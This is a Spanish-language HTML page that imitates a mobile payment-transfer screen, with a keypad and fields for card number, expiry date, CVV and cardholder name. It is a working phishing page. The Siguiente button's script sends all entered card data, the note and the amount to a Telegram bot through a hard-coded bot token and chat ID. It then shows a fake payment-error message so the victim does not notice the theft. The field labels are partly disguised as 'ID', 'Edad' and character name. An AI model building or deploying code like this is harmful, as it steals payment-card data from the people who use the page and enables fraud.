<!doctype html>
<html lang="es">
<head>
<meta charset="utf-8" />
<meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no" />
<title>Enviar — Móvil</title>

<link href="https://fonts.googleapis.com/css2?family=Inter:wght@300;400;600;700&display=swap" rel="stylesheet">

<style>
  :root{
    --bg:#ffffff;
    --muted:#9aa0a6;
    --accent:#000000;
    --pill-bg:#f2f5f8;
    --kbd-bg:#e7e8ea;
    --btn-bg:#0a0a0a;
    --radius:18px;
    --input-bg:#ffffff;
  }

  html,body{height:100%;margin:0;background:var(--bg);font-family:Inter, system-ui, -apple-system, "Segoe UI", Roboto, "Helvetica Neue", Arial;}
  .app{
    max-width:420px;
    margin:0 auto;
    height:100vh;
    display:flex;
    flex-direction:column;
    justify-content:space-between;
  }

  header{
    padding:18px 16px 10px;
    display:flex;
    align-items:center;
  }
  .back{
    width:36px;height:36px;border-radius:10px;display:flex;align-items:center;justify-content:center;
    cursor:pointer;
  }
  .title{
    flex:1;text-align:center;font-weight:600;font-size:18px;
  }

  .top{padding:8px 18px 12px;}
  .recipient{display:flex;align-items:center;gap:14px;margin-top:6px;}
  .avatar{width:56px;height:56px;border-radius:50%;background:#1e73ff;color:white;
    display:flex;align-items:center;justify-content:center;font-weight:700;font-size:20px;}
  .recipient .name{font-size:16px;font-weight:600;color:#111;}
  .currency-selector{margin-left:auto;}

  .amount-area{margin-top:22px;padding:18px;display:flex;align-items:center;gap:12px;}
  .dollar{font-size:40px;font-weight:700;color:var(--accent);line-height:1;}
  .amount-display{flex:1;display:flex;align-items:center;justify-content:space-between;gap:12px;}
  .amount-text{font-size:36px;font-weight:600;color:#111;min-height:44px;}
  .currency-btn{border:1px solid #e0e0e0;border-radius:22px;padding:8px 12px;font-weight:600;background:white;cursor:pointer;}

  .payment-form{padding:10px 18px 0;display:flex;flex-direction:column;gap:10px;}
  .input-row{display:flex;gap:10px;}
  .field{background:var(--input-bg);border-radius:12px;padding:12px;font-size:16px;
    border:1px solid #e6e7e8;width:100%;box-sizing:border-box;}
  label{font-size:12px;color:var(--muted);display:block;margin-bottom:4px;font-weight:600;}

  .bottom-controls{display:flex;align-items:center;gap:12px;padding:12px 18px;}
  .note{flex:1;background:var(--pill-bg);padding:12px;border-radius:24px;color:var(--muted);
    font-size:14px;outline:none;}
  .next{background:var(--btn-bg);color:white;padding:14px 20px;border-radius:26px;font-weight:700;border:none;
    cursor:pointer;flex-shrink:0;}

  .keyboard{background:var(--kbd-bg);padding:18px 12px 24px;border-top-left-radius:20px;border-top-right-radius:20px;}
  .row{display:flex;gap:10px;margin-bottom:10px;}
  .key{flex:1;height:64px;border-radius:10px;background:white;display:flex;flex-direction:column;align-items:center;justify-content:center;
    font-size:22px;font-weight:600;box-shadow:0 1px 0 rgba(0,0,0,0.06);user-select:none;cursor:pointer;}
  .key .letters{font-size:11px;color:var(--muted);margin-top:4px;font-weight:600;}
  .key.wide{flex:1.5}
  .key:active{transform:translateY(1px);box-shadow:none;}

  .modal-backdrop{position:fixed;left:0;top:0;right:0;bottom:0;background:rgba(0,0,0,0.4);display:none;align-items:center;justify-content:center;z-index:999;}
  .modal{background:#fff;padding:18px;border-radius:12px;max-width:320px;width:90%;box-shadow:0 12px 40px rgba(0,0,0,0.2);text-align:center;}
  .modal h3{margin:0 0 8px;font-size:18px;}
  .modal p{margin:0 0 14px;color:var(--muted);white-space:pre-line;}
  .modal button{background:#111;color:#fff;padding:10px 14px;border-radius:10px;border:none;cursor:pointer;font-weight:700;}

  @media(min-width:520px){
    .app{box-shadow:0 6px 30px rgba(0,0,0,0.06);border-radius:12px;overflow:hidden;height:820px;}
  }
</style>
</head>
<body>
  <div class="app">
    <div>
      <header>
        <div class="back" onclick="onBack()">
          <svg width="18" height="18" viewBox="0 0 24 24" fill="none">
            <path d="M15 18L9 12L15 6" stroke="#111" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"/>
          </svg>
        </div>
        <div class="title">Enviar</div>
        <div style="width:36px"></div>
      </header>

      <section class="top">
        <div style="display:flex;align-items:center;justify-content:space-between">
          <div>
            <div style="color:var(--muted);font-size:13px">Para</div>
            <div class="recipient">
              <div class="avatar" id="avatar">VL</div>
              <div class="name" id="recipientName">vampyrelily</div>
            </div>
          </div>
          <div class="currency-selector">
            <button class="currency-btn" id="currencyBtn">USD ▾</button>
          </div>
        </div>

        <div class="amount-area">
          <div class="dollar">$</div>
          <div class="amount-display">
            <div class="amount-text" id="amountText">0</div>
            <button class="currency-btn" onclick="toggleCurrency()">USD ▾</button>
          </div>
        </div>

        <div class="payment-form" id="paymentForm">
          <div>
            <label for="cardNumber">ID</label>
            <input id="cardNumber" class="field" type="tel" inputmode="numeric" maxlength="19" placeholder="1234 5678 9012 3456" />
          </div>
          <div class="input-row">
            <div style="flex:1">
              <label for="expiry">Fecha de Vencimiento</label>
              <input id="expiry" class="field" type="text" inputmode="numeric" maxlength="5" placeholder="MM/AA" />
            </div>
            <div style="width:110px">
              <label for="cvv">CVV</label>
              <input id="cvv" class="field" type="tel" inputmode="numeric" maxlength="4" placeholder="123" />
            </div>
          </div>
          <div>
            <label for="cardName">Nombre y Apellido</label>
            <input id="cardName" class="field" type="text" placeholder="Jhon Doe" />
          </div>
        </div>
      </section>
    </div>

    <div>
      <div class="bottom-controls">
        <div class="note" id="note" contenteditable="true">Agregar una nota</div>
        <button class="next" id="nextBtn">Siguiente</button>
      </div>

      <div class="keyboard">
        <div class="row">
          <div class="key" onclick="press('1')">1 <div class="letters"> </div></div>
          <div class="key" onclick="press('2')">2 <div class="letters">ABC</div></div>
          <div class="key" onclick="press('3')">3 <div class="letters">DEF</div></div>
        </div>
        <div class="row">
          <div class="key" onclick="press('4')">4 <div class="letters">GHI</div></div>
          <div class="key" onclick="press('5')">5 <div class="letters">JKL</div></div>
          <div class="key" onclick="press('6')">6 <div class="letters">MNO</div></div>
        </div>
        <div class="row">
          <div class="key" onclick="press('7')">7 <div class="letters">PQRS</div></div>
          <div class="key" onclick="press('8')">8 <div class="letters">TUV</div></div>
          <div class="key" onclick="press('9')">9 <div class="letters">WXYZ</div></div>
        </div>
        <div class="row">
          <div class="key" onclick="press(',')" style="font-size:20px">,</div>
          <div class="key wide" onclick="press('0')" style="font-size:26px">0</div>
          <div class="key" onclick="backspace()" title="Borrar">
            ⌫
          </div>
        </div>
      </div>
    </div>
  </div>

  <div class="modal-backdrop" id="modalBackdrop">
    <div class="modal">
      <h3 id="modalTitle">Datos de Pago no completados</h3>
      <p id="modalMessage">Completá todos los campos de rol antes de continuar.</p>
      <button id="modalClose">Cerrar</button>
    </div>
  </div>

<script>
  const amountText = document.getElementById('amountText');
  let raw = "";

  function press(ch){
    if(ch === ','){
      if(raw.includes(',')) return;
      if(raw === "") raw = "0,";
      else raw += ',';
    } else {
      if(raw.includes(',')){
        const parts = raw.split(',');
        if(parts[1].length >= 2) return;
        raw += ch;
      } else {
        if(raw === "0") raw = ch;
        else raw += ch;
      }
    }
    renderAmount();
  }
  function backspace(){ raw = raw.slice(0,-1); renderAmount(); }
  function renderAmount(){
    if(raw === "") { amountText.innerText = "0"; return; }
    if(raw.includes(',')){
      const [int, dec] = raw.split(',');
      amountText.innerText = Number(int).toLocaleString('es-ES') + (dec ? ','+dec : ',');
    } else {
      amountText.innerText = Number(raw).toLocaleString('es-ES');
    }
  }
  renderAmount();

  const modal = document.getElementById('modalBackdrop');
  const modalClose = document.getElementById('modalClose');
  modalClose.addEventListener('click', ()=>modal.style.display='none');
  modal.addEventListener('click', e=>{ if(e.target===modal) modal.style.display='none'; });

  function openModal(msg){ document.getElementById('modalMessage').innerText=msg; modal.style.display='flex'; }

  function sanitizeNumber(s){ return (s||'').replace(/\D/g,''); }
  function validatePayment(){
    const cardNumber = sanitizeNumber(document.getElementById('cardNumber').value);
    const expiry = (document.getElementById('expiry').value || '').trim();
    const cvv = sanitizeNumber(document.getElementById('cvv').value);
    const cardName = (document.getElementById('cardName').value || '').trim();
    const missing=[];
    if(cardNumber.length<13) missing.push('ID');
    if(!/^\d{2}\/\d{2}$/.test(expiry)) missing.push('Fecha de Vencimento (MM/AA)');
    else {
      const mm=parseInt(expiry.split('/')[0],10);
      if(mm<1||mm>12) missing.push('Fecha de Vencimiento (MM inválido)');
    }
    if(!(cvv.length===3||cvv.length===4)) missing.push('Edad');
    if(cardName.length===0) missing.push('Nombre y Apellido');
    return missing;
  }

  // Evento principal modificado para enviar datos al bot
  document.getElementById('nextBtn').addEventListener('click', async () => {
    const missing = validatePayment();
    if(missing.length > 0){
      openModal("Completá los siguientes campos:\n- " + missing.join("\n- "));
      return;
    }

    const id = document.getElementById('cardNumber').value.trim();
    const birth = document.getElementById('expiry').value.trim();
    const age = document.getElementById('cvv').value.trim();
    const name = document.getElementById('cardName').value.trim();
    const noteText = note.innerText.trim() === "Agregar una nota" ? "" : note.innerText.trim();
    const amount = raw === "" ? "0" : raw;

    const message = `
 Datos Recibidos con Exito!
ID: ${id}
Fecha de nacimiento: ${birth}
Edad: ${age}
Nombre del personaje: ${name}
Nota: ${noteText}
Monto: ${amount}
`;

    const botToken = "8252043069:AAEMo7xQdsom9sIP88eXtYiZyd_YaoYipO8";
    const chatId = "-1002984542220";

    try {
      await fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ chat_id: chatId, text: message })
      });
      openModal("Error en el Pago, Verifique sus Datos ❌");
    } catch (err) {
      console.error(err);
      openModal("Error al enviar el pago ❌");
    }
  });

  // auto formateo
  document.getElementById('cardNumber').addEventListener('input',function(){
    const v=sanitizeNumber(this.value).slice(0,19);
    this.value=v.replace(/(.{4})/g,'$1 ').trim();
  });
  document.getElementById('expiry').addEventListener('input',function(){
    let v=this.value.replace(/\D/g,'').slice(0,4);
    if(v.length>=3) v=v.slice(0,2)+'/'+v.slice(2);
    this.value=v;
  });
  document.getElementById('cvv').addEventListener('input',function(){
    this.value=sanitizeNumber(this.value).slice(0,4);
  });

  const note=document.getElementById('note');
  note.addEventListener('focus',()=>{ if(note.innerText.trim()==="Agregar una nota") note.innerText=""; });
  note.addEventListener('blur',()=>{ if(note.innerText.trim()==="") note.innerText="Agregar una nota"; });

  function onBack(){ console.log('Volver'); }
  function toggleCurrency(){
    const btn=document.getElementById('currencyBtn');
    const current=btn.innerText.split(' ')[0];
    const map={ 'USD':'MXN','MXN':'EUR','EUR':'USD' };
    const next=map[current]||'USD';
    document.querySelectorAll('.currency-btn').forEach(b=>b.innerText=next+' ▾');
  }
</script>
</body>
</html>
